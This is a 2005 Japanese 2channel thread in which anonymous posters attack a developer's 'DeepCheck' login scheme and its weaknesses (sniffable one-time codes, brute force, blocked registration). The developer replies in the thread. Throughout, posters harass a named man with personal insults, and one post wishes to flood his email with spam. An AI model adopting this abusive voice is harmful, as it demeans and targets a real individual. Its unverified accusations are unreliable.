名無しさん@お腹いっぱい。 :2005/11/21(月) 13:09:55
>>164 お前本当に馬鹿だな。
使いにくければいいのか。ほー。
使いづらいことでオペレーションミスが出るってのを「可用性の欠損」つって
セキュリティレベル判定の減点項目なんだがな。
お前、セキュリティって何かわかってねえだろ。
169 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 13:14:22
ってか、浦本はセキュリティについてまず勉強しろ。 浦本はセキュリティについて基礎のキの字をローマ字入力する最初の「k」程度にも理解してないのがバレバレだ。
170 :
162 :2005/11/21(月) 13:16:48
>>164 経験則で申し訳ないのだけど
これくらい複雑な手順があると、
ユーザーはまともに使ってくれないんだよねー。
あと、サービスデバイスを使うと
パスワードをメモしているのとあんまり変わらないから
意味がないと思うんだよねー。
あと、これを使って何がしたいかよくわかんないんだよねー。
ちょっと自社で採用したくはないかも。
171 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 13:20:28
その「サービスデバイス」にも疑問があるなあ。 どうやってアプレットを操作するつもりなんだろうなあ。 っていうか、DeepCheckに汎用性が全く見えないんだけどなあ。 一見して「あ、これウチのシステムに乗るな」と思わせられない時点で売れないし、 仮に思わせられてもどんな品質か検討されたらショボすぎて話にならないのがバレるし、 どうしようもねえよ。 浦本でもメシ食ってネットできるってのは、日本が豊かな証拠だね。
戻りました。
>>171 さん。DeepCheckBase も DeepCheck も、これから発表するDeepCheck+ も、どこにもアプレット使ってないですよ。
DeepCheckBase 用に、deepchecker というJavaアプリケーションは提示しています。
それに、deepchecker を実際つかうのではなくデモ用として用意したことも、欠いてあります。
>>170 サービスデバイスについては、ほぼ現在既に販売されている他社製品と同様で、本人確認では
なくなる場合(デバイスを持っていれば本人と同じ)があることも指摘させてもらっています。
>>167 そうですね、パラメータ渡しはありです。が、多くはないものの、サーブレット起動の度にパラメータうつのもミスが
起き易くなるかもしれません。そこで、バッチファイルの登場でしょうが、ここまでくると、ハードコーディングとさほど変わりませんね。
パッケージとして販売するモデルを考えるのならありですが、既存システムへの組み込みなど、責任が発生しますから、当方で組み込み、現調までやるしかないと考えています。
---
今回のサイト再開の遅れは、レジストラへの申請が遅れた事のみです。
ローカルIPは最悪の事態に備えDDNSを使うテストをしていたものが一時的に流れただけです。
DeepCheckBaseとDeepCheckを混同されている可能性があります。 お答えしてるのは、なんせ一人なもので、どちらの事なのかは、明記いただければ助かります。
>>167 さん
> お前、ローカル環境でテストしてねえだろ?
とありますが、まず、ローカルでテストしています。
そしてグローバルでも。
いま、しっかり動いているのが証です。
>>168 さん
今まで販売されている認証インタフェースと比べると、たしかに、ユーザビリティは落ちます。
これは、今後、なんとか、したい所です。
ただ、いくつかプロト作ってみたのですが、使い易さと対スパイウエア強度は、あきらかに、トレードオフな
関係ですね。
使い易さをとるか安全性を取るかの選択です。
現在使用されている認証システムで今後、問題が出なければ、それはそれで結構な事と思います。
ただ、無知識な私でさえ気づく脆弱性をもったものが現に使われていますし、大きな問題に発展する
のは時間の問題かと思っています。
いろいろ入ってもらえて感謝してます。(皮肉でなく) やはりひとりでやってると、思わぬ落とし穴がありますののね。 残念なのは、文章でのコミニケーションの限界でしょうか。すれ違いが多いな。情報が錯綜してるな、 という感じは受けています。 数日後にアルバイトも終わりますし、販売対象バージョン「DeepCheck+」の公開もいたします。 性急に結論を出すより、最後まで見届ける方が、よろしいかと、確信しています。
>>139 女房持ちらしいけど子供はいない。
ハゲは毛無し、種無し、根性無しだからw
178 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:01:11
情報が錯綜してるんじゃなくて、 浦本がまともな日本語で書けていないのが問題なだけだ。
179 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:01:53
>>175 DeepCheckにある問題が何度も何度も指摘されているのに気づけないお前が何に気づけるというんだ
180 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:13:16
おお、すまんすまん。UAは全部JavaScriptだったか。 一瞬見て吐き気がするUAだったんでページのソースまでは見てなかったよ。 これは俺のミスだな。確かにアプレットではなかった。訂正するよ。
>>180 さん
なんか、オイラに遺恨でもあるの?
>>180 さん。
オイラの真似をしなくてもよろしいですよ。
UI をわざわざ UA と書くとは。
183 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:22:28
>>175 >使い易さと対スパイウエア強度は、あきらかに、トレードオフな関係ですね。
間違い。んなことはない。
使いやすさはインターフェィスの問題で、セキュリティの問題ではない。
184 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:23:57
>>181 遺恨なんかあるわけないだろ。浦本程度が俺の足元にでもすがりつけるわけがない。
単にあんまり馬鹿な奴がいるから具体的に問題点を列挙しているだけだ。
問題点がありすぎていくら書いても終わらないからいい暇つぶしになる。
>>183 そうですか。そう仰るなら、今の時勢ですから、そういう、ユーザビリティもよくスパイウエア
にも強いやつをご提案いただけると、世の中、大変助かると思うのですが。
まぁ、DeepCheck はユーザビリティも悪く、スパイウェアにも弱いわけだが。
187 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:26:30
とりあえず浦本は手近なところで日本語教育を受けたほうがいい。 で、読み書きができるようになったら、基礎からITまわりを勉強したほうがいい。 ある程度理解が進んだら、DeeoCheck関連がいかにショボかったか、ねらーの連中がどれだけ正しかったか 嫌というほど解るだろうから、そうなったら出直せ。そのほうがいい。 その頃にはまともな仕事も取れるようになるだろう。 今なら職安で職業訓練も斡旋してくれるらしいから、訓練を受けてみたらどうだ。
188 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:29:12
>>185 本当に馬鹿だな( ´ー`)y-~~~
そんなもんはすでに世の中にたくさんあるんだよ。
つうか「スパイウェアに強い」って何だ?言ってみろ。
浦本言語は日本語と語彙が違うからな。とりあえず単語はキッチリ定義しないと、
浦本脳の浦本解釈でまた浦本世界の法則でしか通用しなくなる。
189 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:30:11
ああ、
>>188 でいう「世の中にたくさんある」ってのは
少なくともDeepナントカより使いやすくて充分な強度を持っているモノ
ってことで。誤解のないように。
>>187 さんも(実は同一人物?)オイラといっしょに小学校再入学しましょうぜ。
おっと、忘れるとこだった。
周りの同僚さんに言っといたほうがこれ教えてやったの俺だ、と。
DeepCheckがダメと実証されれば、あなたは、一躍、ねらーの時の人。
191 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:33:53
>>190 ふざけるな。浦本程度と同類なのは浦本一人しかいないだろうが。
どこまで馬鹿なんだ。お前、普通に殴られてるだろ。ネット弁慶でなければお前がリアルで無傷に済むはずがない。
>DeepCheckがダメと実証されれば、あなたは、一躍、ねらーの時の人。
すでに実証済みだろうが。まだわからんのか。
前スレから100万回音読して来い。
>DeepCheckがダメと実証されれば もう実証されているんだが
193 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:38:39
・最悪二回スニフされたらシーザー暗号で言うスライド値がバレて具がバレる この時点でシーザー暗号よりひどいんだけど。 一発で漏れるBASIC認証よりマシって程度で、あの糞インターフェィス。 なんですかコレは。こんなもん、BASIC認証で実装したほうが100万倍マシだろうが。 「現在のパスワードに次回パスワードをつないで入力してください」 あとはCGIなりなんなりでリクエスト復号してパスワードを再構成して反映させりゃOK はるかに使いやすくてチープチェック程度の強度は実装可能だ。 はっきり言って浦本のこの一年か二年か知らんがやってきたことは 1 0 0 % ム ダ だ っ た ってことだ。認めたくないだろうがそれが事実なんだよ。
>>192 >もう実証されているんだが
サーバ間違ってんじゃない?
オイラは訴えないけど、他社は違うかも知れないから、URL には気をつけて。
>>410 さんなら、ちゃんと証拠見せるんじゃないかな?
>>194 >サーバ間違ってんじゃない?
間違えていません
196 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:42:15
>>194 100万回音読しろと書いたはずだ。
浦本程度が一般市民様のご命令をブッチしてんじゃねえよ。
前スレで100%破られてるのが見えないか?
思考能力だけでなく視力まで失ったのか?
197 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:43:07
ってか、あんな糞システム乗せてるところって糞会社の糞サーバ一個しかありえねーだろ。 DNSもろくにメンテできない糞がやってる会社の糞みてえなポートでHTTPやってる糞サーバだ。
>>193 さん
そうとは言えないみたいですよ。
あなたも実名を出さざるをえないくらいな事が起きるかもね。
こうやって相手するのがむかつくのでしたら、やめますが。
100 % だめな 認証システムのことを、あれやこれや言ってたって、あいてにするだけ、あなた地震が
腐るんじゃないですか。
数名、何人かは解りませんがROMしてるひともいるだろうから、だめならだめで、欠かなきゃいいし、
欠きたいのなら、もう少し、私を納得させてください。
お願い申し上げます。
>>198 もう何度も何度も何度も何度も何度も何度も、納得できるネタは挙がってるの。
納得できない(理解できない?)人がいるだけの話。
1年間が丸々無駄か。どんな気持ちなんだろうね?
201 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:50:46
>>198 俺が実名を出さなきゃならないようなこと?
ああ、おきるかもな。ただしその時は「浦本ナントカ」も「Deepナントカ」も全く関係無いね。それは言い切れる。
てか、俺は浦本程度のために実名を出せるほど小物じゃねえんでな(笑
普通のサラリーマンでも俺と同じように浦本程度に名前を出すほど小物じゃねえだろう。
てか、たぶん真面目なリーマンのほうが俺より大物(笑
>もう少し、私を納得させてください。
いや、見てる人は100%浦本がわかっていないだけだってわかってるから。
誰かDeepCheckなるものを擁護できるか?ん?
できやしないだろう。本質的にDeepCheckは役に立たないからな。
信用というものがどれだけ大切なものか、このハゲ社長にはわかっていないらしい
203 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:54:28
てか、事件起こす気じゃねえだろうな(苦笑 >浦本 「2ちゃんねるで馬鹿にされたーーーーーーー!」とか叫びながら道行く人を包丁で・・・とか そんなことをやるんじゃないぞ。馬鹿にされたんじゃなくて馬鹿がばれただけなんだから。 それに、そんなことをしてもスレ住人にインタビュアーが突撃したり実名でコメントとられることはないから。
204 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 16:55:48
>>202 信用を得たことがないから信用の大切さもわからないんだろう。
>>198 > 欠きたいのなら、もう少し、私を納得させてください。
それが難しい。
>>202 そうね〜、さぞかし、ねら〜は信用がある事でしょう。
>>203 そうじゃなくて、あなたが、DeepCheckは糞認証システムだと見抜いたんだから、
ひろーになるチャンスかもってこと。
207 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 17:00:45
>>206 だとしたら日本中のセキュリティ屋とIT屋とプログラマのうち、
ただ一人浦本以外は「ひろー」だな。
このハゲの一生ってなんだったんだろうね?虚しいね。
>>207 5時になった事だし「ひろー」は、そろそろ帰り支度始めた方が。
210 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 17:04:17
てかさあ。 DeepCheckがグダグダだってのは「コーラを飲んだらゲップが出る」くらいあたりまえのことなんだけど、 そんなもんで実名が出るくらいたいしたもんだとは思えないねえ。 で?まさか「あのDeepナントカを破った超人エンジニア!!」とか特集組まれるとか妄想したの? そんなにあの糞がいいものだと思ったってか?ん?誰も相手にしなかったアレが?? 今は単なる笑い者でしかないだろうが。笑い者が笑われてる理由を笑っている奴が知っているからって 笑っている奴が偉いわけでもなんでもない。ただ笑われている奴が笑われるような奴だってだけだ。
戦場に英雄はいない。 オレの知っている英雄は、戦場で死んだか刑務所に入っているかのどちらかだ。
212 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 17:05:46
>>209 お前と違って大抵の奴は忙しく仕事してるんだと思うけどな。
ま、俺もたまたまヒマになって遊んでいるわけだが。
先方の都合で一日予定が伸びたおかげで今日は忙しくないのさ( ´ー`)y-~~~
たまにこんな日があると妙に嬉しいもんだな。毎日日曜日の奴にはわかるまい。
1年間ずっとこんな感じできたんだろうなぁ。 「やめておけ」という善意の忠告とかも無視して。
おまえは最初から負け犬ムードだったのだ
210-214 実は1人。
みっともない晩年だね。子供がいないのが不幸中の幸いか。
217 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 17:19:39
スパマーの晩年は惨めなものだね
そういえばスパマーだったんだな。
つうかこの人うちの親父と同じくらいの歳(うちの親父の方がちょっとだけ上だけど)なんだよな。 いい歳してなにやってるんだよ。 なんだか切なくなってきたな。
人はまた、同じ過ちを繰り返す・・・・まったく!
浦本先生! DeepCheckはどうしてスパイウェアに強いんでしゅか?? 僕、どうしてもわかんないでちゅ。
浦本ってさ、国語と算数の成績はすごい悪かったんじゃない?w
ほんと浦本はダメなやつだなぁ (´▽`;)
なんか賑わっているみたいだけれど、オレの出る幕はないな
(´-`).。oO(し○ふ氏にはいつ謝るんだろ…。) (´-`).。oO(JavaHouseにはいつ謝るんだろ…。) (´-`).。oO(セキュmemoにはいつ謝るんだろ…。)
うらもっさん、 1.人に迷惑をかけること 2.犯罪を犯すこと 3.自殺をすること この3つだけは守ってくれ!人間として!! 最低これだけは守ってくれお願いだ。 気がふれて血迷うことがありませんように…。(^∧^)
>>228 いや、それ守られると人に迷惑かけられるから
「人に迷惑をかけないこと」「犯罪を犯さないこと」「自殺をしないこと」
と書くべきじゃないか。
>>227 >し○ふ氏にはいつ謝るんだろ…。
なんで俺が誤らなけりゃならないの?
あなた、ことのいきさつわかってんの!!!、え!!!解ってかいてるの!
Deep Check Baseは結局ペーパーウェアなのか?
>>230 今までの浦本の誠意のなさを見てると、浦本が悪いことしたんだろうなーって思ってたりする
浦本って信用ないなw
>>232 軽々しく、誠意だどうのかくなっ!!!
>>231 DeepCheckBase は、50名余りの人が体験済み。
236 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 22:20:58
239 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 22:28:58
コイツってもと広告屋だろ? 中身のないものを、さもあるかのように見せるのがコイツの仕事なんだろ? でもDeepCheckでは大失敗して、発売前に化けの皮がはがれたわけだがw
セキュmemoには迷惑かけたと思ってないんだろうね。 JavaHouseは読んでなかったから経緯わかんないけど。 ま、セキュmemoに来なくなっただけかなりマシっす。助かりました。 謝罪は要らんからここから出てこないでくださいね、浦本先生。
>>238 話しが逆だろ。
>署名とか言う後付けに告知を、あれこれいうのは、人の顔やお国なまりをあざ笑うのと等しい。
>オープンソースについての考えを聴いたら、利用されていると一方的に態度を豹変させる。
顔を見せて俺の揚げ足を取ってみてくれ。
>>よく、発売前だということに気づいたね。 みんな誤解してるけどね。
>>239 おい、コテハン!おまえ、ほんとタチ悪いな。
こんな板でぶすぶす燻ってないで、なにか発表してくれ。
そしたら、いくらでも、論評する。
>>243 おい、コテハン!おまえ、ほんとタチ悪いな。
こんな板でぶすぶす燻ってないで、なにか発表してくれ。
そしたら、いくらでも、論評する。
245 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 22:39:27
>>241 ハゲよ、猥褻物陳列罪って知ってるか?
オマエの署名のことだよ。
ここは、LANや個人のPCへの侵入、トロイ、ウィルス、スパイウェアなど、 様々なネット上の危険や、その対策方法を語りあうための板です。 だってさ。みんなわかってるのかな〜!
>>246 そういえば他人のPC上で不正な手段で個人情報を抜いていた人がいましたね?
>>246 とりあえず、おまえのトロイ、ウイルス、スパイウェアそれぞれの定義を書いてくれ。
前スレからさんざん議論してるのに、お前だけ異次元の話しばっかしてるからな。
やっぱ時間帯かな。この11時前後は小学生タイムらしい。 ま、みんなで仲良くやりなよ。 おジジは、も少し骨のあるねら〜がくるまで、寝るわ。 じゃ、オヤスミ。
250 :
227 :2005/11/21(月) 22:52:34
( ´∀`)ギャ――――ハハ八 ノ \/ \ すげ〜〜なぁー。これ。 今日はなんか妙に紳士ぶってるから、ためしに昔のネタを書いてみたら案の定、速攻で本性があらわれてやんのw しょせん浦本は浦本、似合わんことすんな、おまえの本性なんて皆にばれとるわ〜(笑)
>>249 浦本にとっての「骨のある」ってさ、めちゃくちゃレベル低いんだよね・・・。
このハゲにスパムを嫌というほど味あわせてやりたい と思ったらメアドが書いてあったw
>249 お、オレの出番か?w
ウラモティはふて寝か(笑)
255 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 23:20:53
256 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 23:23:04
つうか、発売前にショボさがばれてよかったじゃないか。 こうやって無償でデバッグしてくれるボランティアがたくさんいたんだ。 礼の一つでも言えよ。お前なんかリアルじゃ誰にも相手にされてないんだからさ。 2ちゃんの半分は優しさでできているってのは、ほんとこういうスレ見てるとよくわかるよ。
>>246 > ここは、LANや個人のPCへの侵入、トロイ、ウィルス、スパイウェアなど、
> 様々なネット上の危険や、その対策方法を語りあうための板です。
>
> だってさ。みんなわかってるのかな〜!
よくお前の口からこんな言葉が出るもんだな。
数々のMLで自分ルールで好き勝手し放題したのはどこのどいつですか〜?
MLのルールも無視して自分の解釈を他人に押し付けて、数千人、数万人に嫌がらせをしてたのはどこのどいつですか〜?
それはそこのお前です。お前だよ浦本!(笑)
あんまりおっさんをいじって遊ぶなよかわいそうじゃないか。 もう見てらんないよ。 うらもてぃも>249みたいな憎まれ口たたくのはやめろよ。 いい大人なんだから。 (もし話すことがあればだが)純粋に技術的なことだけを話し合わないか? 結局話すことがなくて(話すことができなくて)閑散とするならそれでそれで いいと思うし。 くだらないまぜっかえしだけでスレを進めるのはどうかと思うんだよ。 確かにそうなる責任の大半はうらもてぃにあるよ。でもほらかわいそうな人 相手なんだから辛抱強く話を進めるべきだと思うんだよ。 まぜっかえしに反応しなければ、そんなことをやっても無駄だと気がついて(学習して) やらなくなるんじゃないかと思うんだけど。
>>258 過去、アナタみたいな優しい人が数人現れました。
彼らはウラモティを可哀想だと思いました。優しい言葉をかけ助言もしました。
でもだめでした。
ダメだったのです。俺のように…。
260 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 23:40:24
>>258 たぶんそれは五十数年間試されつづけて、その結果がアレだと思うんだ。
浦本と技術的な話しをする場合、まず用語の定義からしなきゃならんのだよな。 でも浦本はそれをすごく嫌がってる節がある。
ウラモティの奥さんはウラモティをどう思ってるのかなぁ・・・
>>258 言ってることはホントによく分かる。
だけど、場所が2chじゃ難しいかもね。。。
264 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 00:09:00
話が通じない
>93 名前:uramoty[
[email protected] ] 投稿日:2005/11/20(日) 00:18:30
>
>>89 何が「は ぁ ?」だ。
>
>日本語の解らない書けないオイラを相手にしているあなたも、「は ぁ ?」ナノが、わかってないんだよ。
>都合の良い事に 2ch は、解る解らないの場じゃないしね。
>都合の良い事に 2ch は、解る解らないの場じゃないしね。
>都合の良い事に 2ch は、解る解らないの場じゃないしね。
>都合の良い事に 2ch は、解る解らないの場じゃないしね。
>都合の良い事に 2ch は、解る解らないの場じゃないしね。
>都合の良い事に 2ch は、解る解らないの場じゃないしね。
浦本さん、俺の質問無視しないでくれよ。
>>85 > また、セキュリティ=暗号の高度化と思い込んだ人がいかに多いか、はっきりしただけでも、nemo への
> 投稿は意味があった。
「セキュリティ=暗号の高度化」が問題ならば、その問題点と影響を具体的に例示すること。
前にも言ったんだけど、無視されたんだよな。
267 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 01:47:28
いや〜、信頼って怖いね…。 もしウラモティがまともなことを言うようなっても信頼回復には相当時間がかかりそうだな。 ここに居る人の大部分がセキュmemo、JavaHouse、MySQLMLなどから来た人達だろう。 そういうMLを見てるってことは程度の差はあるにしろ皆その道で生きている人達なんだろう。 ウラモティの失敗はここにあるな。 自分のやって来たことがどれだけの人の反感を買ったのか、未だに全然理解していないだろう。 各MLのサイレントマジョリティがどれだけいるか考えたことはないのだろう。 未来のお客さんかもしれないのに…。 今回、DeepCheckの件で名誉挽回のチャンスはあったと思うんだが、これがまた火に油をそそぐと言うか(苦笑) ウラモティは一言でいうと修行が足りないよ。 ウラモティがいう言葉はうすっぺいらいんだ、何故なら裏付けがないからだ。 そのうすっぺらさは、ウラモティ、あんたが1番分かってるんじゃないのかね? あー、わかってねーかw
269 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 02:27:58
ノ \三三ト、 /--,, れ / ,,_''- ,,_ ̄i =--/ ノ ノ レ >''' ̄\ ''- ,, | ,,r--,,,_ ノ ┃'- ├t弋ァ }//-丶, ! \ _ / 丶-< { うヽ } ,,, ''' 'T (赤っ恥) ト、| r─'( __ } ''-イ  ̄ヽ ''ー'' \ | \__ /''T ,/ "T-、 \_ , (幻 想) -r 丶 ト-=''''-'' }浦 ̄--'''' (無 能) ノ ,. ヘ jヽ, }\ ヽ 本 \/| ↑ /\ \ 勝 | ( ↑ / \ / 久 | ) ( / \  ̄ ̄ ̄ ̄ ̄ ( ) /_ \ ) ( ウラモティチルドレン  ̄ | 信 残 引| ̄ ノ⌒ ̄⌒γ⌒ ̄⌒ゝ / / | 用 り 退| ノ DeepCheck ゝ / / | と 少 の| 丿 ゞ _/ ∠ | 信 な 義| 丿/|/|/|/|\|\|\|\|\ゝ .\ / | 頼 い 務| │ V ――| を 資 、|――――――――――┼――――――――――――――――― / 失 金 背ヽ 巛巛巛巛巛巛巛巛 人巛巛巛巛巛巛巛巛巛巛エクスファの総力 う と 水 毛 の 髪 陣
ウラモティよ、困った時はいつでもこのスレに来てくれ。 俺たちが力になるぜ。
さすがにJavaHouseには謝罪したほうが良いと思うよ、浦本さん。
おはよ〜す。
いろんなアドバイスありがとう。
おれからみると主客逆転な話しが多く、困惑、です。
ここで書けば書くほど、泥まみれになりますね。
明日は、勤労感謝の日なので、DeepCheck+(DeepCheckPlusかな)に注力できます。
では、休み明けをお楽しみに。
実証イベントは継続中ですから、(
ttp://deepcheck.x-fer.co.jp:8084/noiselethtml/event.html )
俺をへこませるには、こいつで、正式に ura のカーソル行番号を変えてください。
DeepCheck+ はもっと破りにくくなりますので、破るのなら、今のうちです。
>>271 さん、価値観があなたと違うみたいなのです。正直、なぜ謝罪をしなければならないのか、
俺には解りません。
しら@とかいう人が、JHへの私の質問に、いちゃもん付けたんですよ。それも、質問の内容ではなく。
で、JHのテーマと違う問題だからDMで話しましょうと誘ったら、そのDMを 2ch にそのまま、フォワード
した。
これで、どうして、俺がJHにたいして謝罪せねばならないのでしょう?
ま、いまとなったら、どうでも良いです。私は。
それでも謝罪せよと、仰るのであれば、私宛、DMください。
>>249 さん
仰る通りです。何の事は無い自分が子供っぽかった。
反省します。
>>272 浦本さん、論点がずれてませんか?
しら○氏が2chに載せたことなんて、我々にとってはどうでもいいんですよ。
浦本さんにとっては、しら○氏が悪いという認識なんでしょうが。
問題は関係ない他の人たちにまで迷惑かけたことでは??
自分の身を守るためには、自分が出すメールには電子署名をつけることだな。 おっと、2chへの書き込みにも電子署名を付けた方が良いんジャマイカ? いま、uramotyと浦本勝久氏を騙っている香具師はトリップ無しの偽者のようだしなw
>>274 さん
そうですか。
どんな迷惑をかけたのか?よろしければお教えください。
>>275 さん
なるほど。実名に戻しますか。そうしましょう。
277 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 08:34:34
>>276 迷惑メールがなぜ「迷惑メール」なのかわかるか?
>>276 >>275 からなぜ実名に戻すって結論が出るんだ?w
セキュリティやってる人間なのに、本人証明に関しては無頓着だな
279 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 08:37:34
>>278 本人証明のやりかたがわからないんだろう。
だからこそあんな脆弱な「本人認証」を思いつく。
280 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 08:40:51
>>272 >俺をへこませるには、こいつで、正式に ura のカーソル行番号を変えてください。
だからさっさとキャプチャデータ晒せと何度も言われているだろうが。
HTTP のキャプチャ方法がわからないならちゃんと教えを請え。
「2ちゃんねらーの皆様、無能でなんのとりえも無い浦本めにDeepCheckの無力さを
確認するためだけに、どうぞ HTTP のログの取り方をお教えください」と頼め。
人様に物を頼むときはそれなりの態度が必要だ。わかるか?
浦本サソは現在ハローワークで、その自慢のハゲ頭を机に擦り付けて 懇願している最中ですので、そのままの状態でしばらくお待ちください。
ハローワークはめまいがする。
>>281 さん 秀逸。
引退の準備ができました。 任意の毛を、どれか抜いてください。
>>282 逆引き設定ぐらいちゃんと設定しろよ。チョンじゃあるまいし。
285 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 19:52:12
ハローワークの人の眩暈のほうが辛いだろうよ。 浦本の眩暈は単なる老衰だが、ハロワの人は労災みたいなもんだからな。 浦本の居る地区のハロワの中の人がストレス溜まってるんじゃないかと心配だよ。 なんせ浦本が毎日毎日現れては電波飛ばすんだからな。俺なら耐えられん。
288 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 21:22:28
おい、無能の浦本。 馬鹿なお前なりにDeepナントカの利点を必死で妄想したんだろ? 何か利点があると思い込んでいるならその利点とやらを書いてみろ。
289 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 21:27:40
あ、そうそう。Deepナントカって、乱数表より使いづらいくせに乱数表よりスパイウェアに弱いから。
>>288 >>289 コテハンさん、
既にちゃんと書いているので、そちらを再読ください。
DeepCheck+の時、ドキュメントも更新しようとは思っています。
意図的かどうかは解りませんが、アカウント予約はされるものの、アカウント作成をとばし、認証や
カーソル行番号の変更をお試しになる方が多く、DeepCheck+では、このような誤解を招かない様
ドキュメントを見直します。
291 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 21:42:14
>>290 コテハンさんって誰だ?
俺はこのスレでコテハン名乗ったことは無いぞ。
あと、お前が「ちゃんと書い」たことも一度も無いだろ。
何かまともに書いたというならレス番でアンカー打てよ。
つうか利点を書けつってんだから書け。言われたことも解らんのかこの馬鹿は。
言われたことくらいやれ。
292 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 21:43:46
利点を10レス以内にかけないなら利点は無いということで浦本の負けな。 そういうルールに決めた。カーソル行変更とやらと同じように、ルールだ。
>>291 難癖つけたいんだよね。
オイラなりには書いた事、言った事は実行してるつもりなんですよ。
何が何でも反対するどこかの正当みたいに、やれやれ、の連続じゃ、ネラー仲間も離反するかも。
>>292 仕組みは同じでも内容がこう差があったら、見破られるな。
そろそろ正体を明かす潮時かも。
これまでの煽り、大変ご苦労さんでした。
294 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 22:04:26
>>293 はい1レス無駄にした。
利点はないのかい?
書いたことは実行している?嘘をつくな。
DeepCheckが破られたら引退するといって、お前は何をしている?
295 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 22:08:05
それからね。実社会では「やってるつもり」は通用しない。 結果が全てだ。それくらい誰にでもわかることだ。 そして、浦本が作ったDeepナントカには、何ら評価できる結果がもたらされていない。 せめて浦本の言い分を聞いてやろうという親切だ。 あと9レスのうちにしっかり書け。
296 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 22:24:49
じゃあ、問題点を一つ一つ書いていってやろうか。 ひとつはもう書いたな。スパイウェア対策としては役に立たないということだ。 では、もう一つ問題点を追加してやろう。 既存のシステムには対応できない可能性が高い。 馬鹿な浦本のために反論ポイントを例示してやろう。 ひとつめの「スパイウェア対策としては役に立たない」つまり暗号表よりクソって問題への反論には 「具体的に暗号表よりスパイウェア対策として優れていると言う実証」を挙げればよい。 ふたつめ、今書いた「既存のシステムには対応できない可能性が高い」という問題への反論には 「既存システムへの適応例」あるいは「新規システムのみをターゲットとした販売予測」を出せばよい。 出せなければこの問題は解決できないぞ。 さあ、早くしないと問題点は増えていく。のこり9レスしかないぞ。
297 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 22:33:55
出血大サービス。三つ目の問題点だ。 「パスワードの強度が低い」 反論ポイントは、パスワードそのものの強度、つまりパスクラッカーに対する強度を 既存のISMS等の標準的なパスワード管理ポリシーに従ったものと同程度かそれ以上で あると証明すること。最低限既存のパスワードと同程度の強度が無ければ意味が無い。
298 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 22:36:50
大盤振る舞い。四つ目の問題点。 「アカウントの新規登録を妨害できる」 これはサービスを拡張していく必要がある場合致命的になる問題だな。 限定的なサービスであれば、つまりそもそも限定された少人数のアカウントを管理するならまだいいが、 オンラインバンキング等の多数のユーザに登録を促すようなサービスには使えないということだ。 反論ポイントは・・・サービスしすぎだな。これくらい自分で考えろ。
>>294 あなたは410さんじゃない。だから、話しが通じない。
論理的に破れそうであっても実際はなかなか破れない。
だから論理と実際は得てして異なる。
DeepCheckは実際上1度も破られていない。
うん、なかなかのリード、ありがとうございます。
DeepCheckは認証したあとのデータ伝送部分は独自のものをまだ作っていない。
よって、この部分は、他の方法(ほとんどが暗号化による)に頼らざるを得ない。
次の保存部はランダム分散保存として独自化している。
で、データ保存のためにだけ認証があるわけではないのはもちろんで、DeepCheckの体験サイト
は、ここが一番の問題だった。
認証後、なにかコンテンツにつなげるべきだった。
>>297 この指摘はもう古い。
パスワードだけの認証システムなどもう無いにひとしい。
DeepCheckもワンタイム・パスワード化している。
だから、総当たりも、あまり効果を発揮しない。
301 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 22:42:51
>>299 >DeepCheckは実際上1度も破られていない。
お前の大好きな410氏が懇切丁寧に説明したように、破られている。
>次の保存部はランダム分散保存として独自化している。
二つ目の問題点「既存システムに対応できない」がクリアできない。
さあ、残り8レスしかないぞ。
>>298 すまんです。書いてある事がいまいち明確でない。
>アカウントの新規登録を妨害できる
これは何を再sているのでしょう?
303 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 22:44:29
>>300 パスワードによる認証システムについてではなく、パスワードの強度について、だ。
反論ポイントを示してやっても理解できないのか?
DeepCheck は他の認証と同じくブルートフォースに耐えられない。
残り7レス。何一つ反論もできていないし、利点も挙げられていないぞ。
304 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 22:45:25
>>302 読んでそのまま。アカウントの新規登録を妨害することができる。
それも、他のシステムより簡単に。
残り6レス。後が無いぞ。
305 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 22:46:54
DeepCheckは「現在のパスワード」と「次のパスワード」をセットにして送出しているだけだ。 しかも「カーソル変更」には現在のパスワードを二度繰り返したものを送出する。 わかるか? カーソル変更を試みたリクエストは、一度スニフされただけでパスワードが漏洩する。 五つ目の問題点だ。
306 :
